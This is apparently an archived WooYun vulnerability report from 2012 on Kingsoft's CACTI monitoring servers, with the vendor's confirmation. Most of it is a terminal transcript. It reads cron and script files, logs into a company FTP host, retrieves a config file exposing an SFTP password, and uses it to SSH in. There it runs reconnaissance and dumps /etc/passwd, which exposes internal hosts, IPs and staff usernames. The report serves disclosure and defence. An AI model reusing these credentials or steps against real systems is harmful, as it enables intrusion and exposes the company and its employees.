乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-04-16: 细节已通知厂商并且等待厂商处理中 2012-04-17: 厂商已经确认,细节仅向厂商公开 2012-04-27: 细节向核心白帽子及相关领域专家公开 2012-05-07: 细节向普通白帽子公开 2012-05-17: 细节向实习白帽子公开 2012-05-31: 细节向公众公开
金山软件集团为了对服务器进行实时监控,在服务器上自行开发部署了一套基于CACTI的监控服务,在部署时未考虑安全因素,存在多个严重安全威胁,可导致金山软件集团旗下服务器大面积黑客攻击。
当骇客获取金山软件集团某台服务器权限后,查看服务器cron任务计划;
SHELL=/bin/bashPATH=/sbin:/bin:/usr/sbin:/usr/binMAILTO=rootHOME=/# run-parts01 * * * * root run-parts /opt/kingsoft/monitor/core/task/cron.hourly02 4 * * * root run-parts /opt/kingsoft/monitor/core/task/cron.daily22 4 * * 0 root run-parts /opt/kingsoft/monitor/core/task/cron.weekly42 4 1 * * root run-parts /opt/kingsoft/monitor/core/task/cron.monthly03 * * * * root run-parts /opt/kingsoft/monitor/core/task/cron#30 * * * * root rdate -s time-a.nist.gov35 3 * * * root sh /opt/kingsoft/monitor/core/cron/modifypassword.sh30 * * * * root /opt/kingsoft/monitor/core/cron/utctime.sh 00 /opt/kingsoft/monitor/core/cron/tasksleep.sh 120 /opt/kingsoft/monitor/core/taskdata/info_collection/script/info_collection_upload.sh*/15 * * * * root /opt/kingsoft/monitor/core/cron/update.sh >>/dev/null 2>&1
可发现kingsoft的monitore服务,均以文件方式存存储,且文件访问未做任何控制规则。导致多个系统服务密码泄露,严重影响被监控服务器。金山软件集团CACTI服务器:http://221.4.212.203/index.php
/opt/kingsoft/monitor/core/cron/cactirelease.sh
#/bin/sh#This Script is intelligent Cacti's MonitorScript.tar release ToolMonitorScriptPath=/opt/kingsoft/monitorKingsoftHome=/opt/kingsoftCrontFile=/etc/crontabFtpHostChinatel=125.89.65.196FtpHostIntranet=192.168.55.130FtpHostCncnet=221.4.212.203UserName=cacti****PassWord=**********GetFile=monitorbaseGetTar=monitordrelease.tarChinaTel=chinatelecomCncNet=chinaunicomIntranet=intranetUser=ftp_update_user.shupdateCactiFile=main.shrsyncFile=update.sh
[root@localhost ~]# ftp 221.4.212.203Connected to 221.4.212.203.220 Welcome into WOL FTP.530 Please login with USER and PASS.530 Please login with USER and PASS.KERBEROS_V4 rejected as an authentication typeName (221.4.212.203:root): cactirsync331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls227 Entering Passive Mode (221,4,212,203,189,188)150 Here comes the directory listing.-rw------- 1 503 503 7180233 Jan 25 2010 2010-01-24.log.rar.gz-rw------- 1 503 503 1376886 Jan 25 2010 2010-01-25.log.rar.gzdrwx------ 2 503 503 4096 Oct 28 2008 22-rw------- 1 503 503 939956 Feb 22 2010 7z465.exe-rw------- 1 503 503 40093040 Oct 29 2008 DUBA080922_PACIFIC_48_202.exe-rw------- 1 503 503 6181549 Feb 22 2010 FileZilla_3.3.2_win32.zipdrwx------ 2 503 503 4096 Oct 27 2008 MagicSetbetadiy-rw------- 1 503 503 892980 Aug 15 2010 RTX(腾讯通)企业内部通信平台.rar-rw------- 1 503 503 465772 Jul 04 2011 S5120EI-BTM-107.btm-rw------- 1 503 503 9119894 Jul 04 2011 S5120EI-CMW520-R2202P20-S168.bin-rw------- 1 503 503 924880 Mar 15 2010 WinPcap_4_1_1.exe-rw------- 1 503 503 618024 Oct 24 2008 Windows2000-KB958644-x86-CHS.EXE-rw------- 1 503 503 3600 Mar 19 2010 cactirelease.shdrwxr-xr-x 5 0 0 32768 Jan 20 2010 clientdata-rw------- 1 503 503 12657950 Mar 15 2010 ethereal-setup-0.10.14.exe-rw------- 1 503 503 20032944 Oct 29 2008 ftcsetup_huajun.zipdrwx------ 5 503 503 4096 Aug 18 2009 gateway-rw------- 1 503 503 16389120 Aug 18 2009 gateway-dx.tar-rw------- 1 503 503 13705 May 12 2010 index.php-rw------- 1 503 503 388381 Apr 23 2009 [email protected]drwx------ 11 503 503 4096 Apr 20 2010 monitor-rw------- 1 503 503 572541 Jun 16 2009 monitor-windows.zip-rw------- 1 503 503 535603 Apr 18 2010 monitor.rar-rw------- 1 503 503 500166 Mar 16 2010 monitor.zip-rw------- 1 503 503 679427 May 05 2010 monitor_221.23.zipdrwx------ 2 503 503 4096 Aug 12 2008 monitor_new-rw------- 1 503 503 557953 Apr 21 2010 monitor_windows_100420.zipdrwxr-xr-x 2 503 503 4096 Nov 19 2010 monitorbase-rw------- 1 503 503 551275 Jun 10 2010 monitorwindows100610.zip-rw------- 1 503 503 5213 Nov 19 2008 my.txtdrwx------ 4 503 503 4096 Sep 01 2010 newcodedrwx------ 2 503 503 4096 Apr 16 2010 nt-rw------- 1 503 503 12046184 Nov 10 2008 php-5.2.6.tar.gz-rw------- 1 503 503 4384117 Oct 10 2011 pq8.rar-rw------- 1 503 503 465290 Apr 21 2009 pure-ftpd-1.0.21.tar.bz2drwx------ 9 503 503 4096 Aug 19 2009 queryapp-rw------- 1 503 503 445062 Apr 20 2010 safecenter.zip-rw------- 1 503 503 25170201 Apr 20 2011 stat_white.db-2011-03-30-61.136.58.29.gz-rw------- 1 503 503 129996 Mar 09 2010 sysstat-5.0.5-25.el4.x86_64.rpmdrwx------ 3 503 503 4096 Jan 13 2010 zhangwenbindrwx------ 2 503 503 4096 Jun 02 2009 天津小树林drwx------ 2 503 503 4096 Jun 02 2009 珠海IDC-rw------- 1 503 503 763 Jul 05 2011 鍌叉父 3.lnkdrwx------ 3 503 503 4096 Sep 01 2010 鏈懡鍚嶆枃浠跺す226 Directory send OK.ftp> cd /monitor/configbase/cncconfig250 Directory successfully changed.ftp> ls227 Entering Passive Mode (221,4,212,203,219,54)150 Here comes the directory listing.-rw------- 1 503 503 192 Apr 20 2010 infoservers.cfg-rw------- 1 503 503 195 Apr 20 2010 sftpservers.cfg226 Directory send OK.ftp> get sftpservers.cfglocal: sftpservers.cfg remote: sftpservers.cfg227 Entering Passive Mode (221,4,212,203,152,246)150 Opening BINARY mode data connection for sftpservers.cfg (195 bytes).226 File send OK.195 bytes received in 2.6e-05 seconds (7.3e+03 Kbytes/s)ftp> quit221 Goodbye.[root@localhost ~]# cat sftpservers.cfg c:\monitor\lib\monitor_psftp.exe -pw je2@J*9zg6wnfwjh32h3bf45b -bc -noagent -v -batch -b c:\monitor\config\common\sftpscript.cfg [email protected] 1>c:\monitor\log\s221.4.212.203.log 2>&1[root@localhost ~]# [root@localhost ~]# ssh [email protected][email protected]'s password: Last login: Fri Feb 17 11:13:07 2012 from 27.154.32.246[cactiuser@wol-monitor-svr ~]$ which ifconfig/usr/bin/which: no ifconfig in (/usr/kerberos/bin:/usr/local/java/bin:/usr/local/java/jre/bin:/usr/local/bin:/bin:/usr/bin:/data/web/data/clientdata//bin)[cactiuser@wol-monitor-svr ~]$ /sbin/ifconfigeth0 Link encap:Ethernet HWaddr B8:AC:6F:12:0A:6A inet addr:10.20.220.13 Bcast:10.20.221.255 Mask:255.255.254.0 inet6 addr: fe80::baac:6fff:fe12:a6a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2531200998 errors:0 dropped:0 overruns:0 frame:0 TX packets:2436331652 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:965258989840 (898.9 GiB) TX bytes:405395637146 (377.5 GiB) Interrupt:90 Memory:d6000000-d6012100 eth1 Link encap:Ethernet HWaddr B8:AC:6F:12:0A:6C inet addr:10.20.216.5 Bcast:10.20.216.255 Mask:255.255.255.0 inet6 addr: fe80::baac:6fff:fe12:a6c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:13898508 errors:0 dropped:0 overruns:0 frame:0 TX packets:737578 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2324752165 (2.1 GiB) TX bytes:133218008 (127.0 MiB) Interrupt:98 Memory:d8000000-d8012100 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:182264 errors:0 dropped:0 overruns:0 frame:0 TX packets:182264 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:20658245 (19.7 MiB) TX bytes:20658245 (19.7 MiB)[cactiuser@wol-monitor-svr ~]$ arp -a-bash: arp: command not found[cactiuser@wol-monitor-svr ~]$ /sbin/arpAddress HWtype HWaddress Flags Mask Iface10.20.216.240 ether 00:15:17:25:4B:73 C eth1doc.rdev.kingsoft.net ether 00:50:56:A2:00:03 C eth010.20.220.224 ether 00:1E:0B:BF:80:34 C eth010.20.220.229 ether 00:24:E8:55:FB:16 C eth010.20.220.237 ether 00:30:48:D6:14:F0 C eth010.20.216.251 ether 98:4B:E1:6F:33:EC C eth110.20.216.249 ether 00:24:8C:3C:C7:EB C eth110.20.221.150 ether 00:10:5C:FA:F2:14 C eth0dubabin.s.kingsoft.net ether 00:21:5A:4E:D7:E8 C eth010.20.216.4 ether 00:22:19:64:43:F0 C eth110.20.221.222 ether 00:21:97:42:8C:0C C eth010.20.220.238 ether 00:30:48:D6:14:D6 C eth010.20.220.225 ether 00:1E:0B:C0:09:0A C eth010.20.221.226 ether 00:24:81:AA:9A:84 C eth010.20.220.242 ether 00:30:48:D6:14:9E C eth0cm.wol2.com ether 00:26:B9:FC:96:38 C eth010.20.221.117 ether 00:1F:D0:0C:51:78 C eth010.20.216.14 ether 00:50:56:88:2A:5C C eth110.20.220.233 ether 00:24:E8:59:32:7F C eth010.20.221.215 ether 00:26:B9:44:E5:A2 C eth010.20.220.1 ether 00:0F:E2:C7:64:94 C eth010.20.221.12 ether 00:50:56:88:55:53 C eth010.20.220.236 ether 00:24:E8:4F:54:8D C eth010.20.216.189 ether 00:18:71:68:70:DA C eth110.20.216.246 ether 00:1F:C6:65:FB:31 C eth110.20.220.240 ether 00:30:48:D6:14:A0 C eth010.20.220.239 ether 00:30:48:D6:15:68 C eth010.20.216.150 ether 00:30:48:33:30:34 C eth110.20.220.223 ether 00:1E:0B:C0:09:EE C eth010.20.221.115 ether 00:21:97:07:2E:4C C eth010.20.221.26 ether 00:50:56:88:44:E7 C eth010.20.216.215 ether 00:1E:90:83:71:48 C eth110.20.216.198 ether 00:18:71:68:70:A6 C eth110.20.221.181 ether 00:1A:4B:AD:EC:7A C eth010.20.220.222 ether 00:24:E8:54:51:60 C eth010.20.221.35 ether 00:18:71:68:70:34 C eth010.20.221.152 ether 00:30:48:35:01:78 C eth0s.kingsoft.net ether 00:50:56:88:18:27 C eth010.20.221.101 ether 00:1E:0B:BE:4D:E4 C eth010.20.216.18 ether 00:1E:90:83:73:24 C eth110.20.221.119 ether 00:23:54:8D:2D:98 C eth010.20.216.193 ether 00:18:71:68:64:48 C eth110.20.221.13 ether 00:50:56:88:5A:4A C eth110.20.216.233 ether 00:16:EC:48:83:8C C eth110.20.220.231 ether 00:24:E8:51:79:18 C eth010.20.216.244 ether 00:24:8C:3C:C7:E9 C eth110.20.216.231 ether 00:15:17:2C:5C:62 C eth110.20.221.24 ether 00:50:56:88:33:38 C eth010.20.220.235 ether 00:24:E8:51:9F:B0 C eth010.20.221.16 ether 00:14:C2:3A:FB:26 C eth0trac.s.kingsoft.net ether 00:1E:90:81:6E:A0 C eth0res.rdev.kingsoft.net ether 00:50:56:88:58:37 C eth0dp2.wol2.com ether 00:22:19:68:E6:5E C eth010.20.221.89 ether 00:50:56:88:05:65 C eth010.20.220.230 ether 00:22:19:BF:82:37 C eth010.20.221.17 ether 00:50:56:88:2F:C9 C eth010.20.221.38 ether 00:50:56:4E:BA:29 C eth010.20.220.241 ether 00:30:48:D4:5E:AA C eth010.20.220.253 ether 00:30:48:D6:14:CE C eth010.20.216.151 ether 00:22:19:66:B1:CE C eth110.20.216.209 ether 00:10:5C:CA:9C:74 C eth110.20.216.237 ether D4:85:64:4C:32:AA C eth110.20.220.232 ether 00:24:E8:4F:3F:D5 C eth010.20.221.45 ether 00:1E:8C:3A:AD:D8 C eth010.20.216.15 ether 00:50:56:88:7C:9B C eth110.20.220.100 ether 98:4B:E1:6C:0A:16 C eth010.20.216.194 ether 00:18:71:68:70:12 C eth110.20.221.27 ether 00:24:E8:54:52:40 C eth010.20.220.243 ether 00:30:48:D6:13:80 C eth010.20.221.30 ether 00:50:56:88:02:6C C eth010.20.216.246 ether 00:1F:C6:65:FB:31 C eth0dp1.wol2.com ether 00:22:19:69:5D:D9 C eth010.20.221.127 ether 00:1F:D0:0C:4F:7C C eth010.20.216.185 ether 00:18:71:68:70:04 C eth110.20.216.196 ether 00:10:5C:FA:4D:7A C eth110.20.221.15 ether 00:50:56:88:77:8B C eth010.20.220.228 ether 00:24:E8:55:EB:57 C eth010.20.216.196 ether 00:10:5C:FA:4D:7A C eth010.20.216.195 ether 00:18:71:68:64:30 C eth110.20.221.13 ether 00:50:56:88:5A:4A C eth010.20.221.85 ether 00:50:56:88:78:01 C eth010.20.216.215 ether 00:1E:90:83:71:48 C eth010.20.216.217 ether 00:A0:D1:E0:78:E3 C eth110.20.220.234 ether 00:24:E8:51:7C:24 C eth010.20.220.227 ether 00:24:E8:59:32:01 C eth0[cactiuser@wol-monitor-svr ~]$ lastcactiuse pts/0 59.39.*.* Mon Apr 16 14:20 still logged in lijianhu pts/0 10.20.221.11 Fri Apr 6 15:45 - 18:55 (03:09) reboot system boot 2.6.18-128.1.10. Fri Apr 6 15:13 (9+23:07) zhaohaij pts/1 10.20.221.11 Mon Apr 2 15:50 - 18:09 (1+02:19) zhaohaij pts/1 10.20.221.11 Mon Apr 2 15:38 - 15:50 (00:11) zhaohaij pts/1 10.20.221.11 Mon Apr 2 15:33 - 15:36 (00:03) wangxiao pts/1 10.20.221.11 Sun Apr 1 19:27 - 19:29 (00:02) wangxiao pts/1 10.20.221.11 Sun Apr 1 19:22 - 19:24 (00:01) wangxiao pts/1 10.20.221.11 Sun Apr 1 19:04 - 19:12 (00:08) wangxiao pts/1 10.20.221.11 Sun Apr 1 19:02 - 19:04 (00:01) wangxiao pts/2 10.20.221.11 Sun Apr 1 11:56 - 14:11 (02:14) wangxiao pts/1 10.20.221.11 Sun Apr 1 11:53 - 14:11 (02:17) wangxiao pts/1 10.20.221.11 Tue Mar 27 17:25 - 17:37 (00:11) lijianhu pts/1 10.20.221.11 Mon Mar 26 16:34 - 20:43 (04:09) wangxiao pts/1 10.20.221.11 Wed Mar 21 14:58 - 17:09 (02:11) xieyi pts/1 10.20.221.11 Wed Mar 21 12:01 - 12:53 (00:52) lijianhu pts/1 10.20.221.11 Wed Mar 14 10:01 - 10:38 (00:36) zhaohaij pts/1 10.20.221.11 Wed Mar 7 15:57 - 16:01 (00:04) zhaohaij pts/2 10.20.221.11 Fri Mar 2 10:53 - 17:06 (06:12) liangxia pts/1 10.20.221.11 Fri Mar 2 10:24 - 18:16 (07:52) zhaohaij pts/1 10.20.221.11 Thu Mar 1 19:34 - 10:08 (14:33) liangxia pts/1 10.20.221.11 Thu Mar 1 17:09 - 18:01 (00:51) xieyi pts/1 10.20.221.11 Thu Mar 1 14:45 - 15:02 (00:16) zhop pts/1 10.20.188.177 Thu Mar 1 09:29 - 09:33 (00:03) liangxia pts/1 10.20.221.11 Tue Feb 28 10:11 - 10:26 (00:14) zhaohaij pts/1 10.20.221.11 Mon Feb 27 16:35 - 17:47 (01:11) zhaohaij pts/2 10.20.221.11 Mon Feb 27 16:34 - 16:35 (00:01) zhaohaij pts/1 10.20.221.11 Mon Feb 27 14:54 - 16:33 (01:39) zhop pts/1 113.106.106.29 Mon Feb 27 10:40 - 11:54 (01:14) wangxiao pts/1 10.20.221.11 Fri Feb 24 20:30 - 20:32 (00:02) lijianhu pts/1 10.20.221.11 Thu Feb 23 22:22 - 23:25 (01:03) lijianhu pts/1 10.20.221.11 Thu Feb 23 14:31 - 14:31 (00:00) zhop pts/2 202.105.182.222 Wed Feb 22 16:11 - 19:56 (03:45) zhop pts/1 202.105.182.222 Wed Feb 22 16:08 - 19:56 (03:48) zhop pts/1 202.105.182.222 Wed Feb 22 10:53 - 11:37 (00:43) zhaohaij pts/2 10.20.221.11 Sun Feb 19 19:45 - 21:35 (01:50) zhaohaij pts/2 125.89.65.194 Sun Feb 19 19:43 - 19:45 (00:01) zhaohaij pts/2 125.89.65.194 Sun Feb 19 19:43 - 19:43 (00:00) wtmp begins Sun Feb 19 19:43:10 2012[cactiuser@wol-monitor-svr ~]$ cat /etc/issueCentOS release 5.3 (Final)Kernel \r on an \m[cactiuser@wol-monitor-svr ~]$ cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinpegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinhtt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologincactiuser:x:502:502::/data/web/data/clientdata/:/bin/bashvsftpd:x:503:503::/home/vsftpd:/bin/bashkautoadduser:x:512:512::/home/kautoadduser:/bin/bashmonitor:x:514:514::/home/monitor:/bin/bashcactiuser1:x:518:518::/data/web/data/clientdata1:/bin/bashntp:x:38:38::/etc/ntp:/sbin/nologinzhop:x:522:522::/home/zhop:/bin/bashlijianhui:x:523:523::/home/lijianhui:/bin/bashliaozhigang:x:525:525::/home/liaozhigang:/bin/bashwangxiaozhou:x:526:526::/home/wangxiaozhou:/bin/bashzhaoyiding:x:527:527::/home/zhaoyiding:/bin/bashxieyi:x:528:528::/home/xieyi:/bin/bashzhaohaijun:x:529:529::/home/zhaohaijun:/bin/bashliangxiaocong:x:530:530::/home/liangxiaocong:/bin/bash[cactiuser@wol-monitor-svr ~]$ exitlogoutConnection to 221.4.212.203 closed.
更新监控服务架构。
危害等级:高
漏洞Rank:20
确认时间:2012-04-17 10:38
谢谢!我们马上进行修补!
暂无